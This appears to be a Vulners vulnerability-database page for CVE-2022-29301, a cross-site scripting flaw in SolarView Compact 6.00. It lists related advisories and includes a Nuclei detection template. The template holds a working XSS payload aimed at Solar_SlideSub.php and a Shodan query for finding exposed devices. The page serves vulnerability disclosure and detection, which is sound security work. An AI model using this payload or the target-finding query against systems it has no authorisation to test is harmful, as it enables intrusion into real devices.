Lucene search

SolarView Compact 6.00 - 'pow' Cross-Site Scripting

🗓️ 15 Jun 2022 17:08:14Reported by ProjectDiscoveryType

SolarView Compact 6.00 XSS vulnerability in 'pow' paramete

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 6
Cvelist	CVE-2022-29301	22 Jun 202218:11	–	cvelist
0day.today	SolarView Compact 6.00 - (pow) Cross-Site Scripting Vulnerability	14 Jun 202200:00	–	zdt
Exploit DB	SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)	14 Jun 202200:00	–	exploitdb
CVE	CVE-2022-29301	23 Jun 202217:15	–	cve
NVD	CVE-2022-29301	23 Jun 202217:15	–	nvd
Packet Storm	SolarView Compact 6.00 Cross Site Scripting	20 Jun 202200:00	–	packetstorm

Source	Link
exploit-db	www.exploit-db.com/exploits/50968
cve	www.cve.mitre.org/cgi-bin/cvename.cgi
github	www.github.com/ARPSyndicate/cvemon
github	www.github.com/ARPSyndicate/kenzer-templates

id: CVE-2022-29301

info:
  name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting
  author: For3stCo1d
  severity: high
  description: |
    SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact.
  reference:
    - https://www.exploit-db.com/exploits/50968
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cve-id: CVE-2022-29301
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-244067125
  tags: cve,cve2022,xss,solarview,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script><"">'
          - 'SolarView'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c54ec86684a53e9bc9f30d965eede052361a4004563f4a883cd9602764467e5a02201da05aa194285a829f936421e9e1f4ecd921cdff1aaee71160d645156843bdfa:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

15 Jun 2022 17:14Current

5.8Medium risk

Vulners AI Score5.8

EPSS0.00175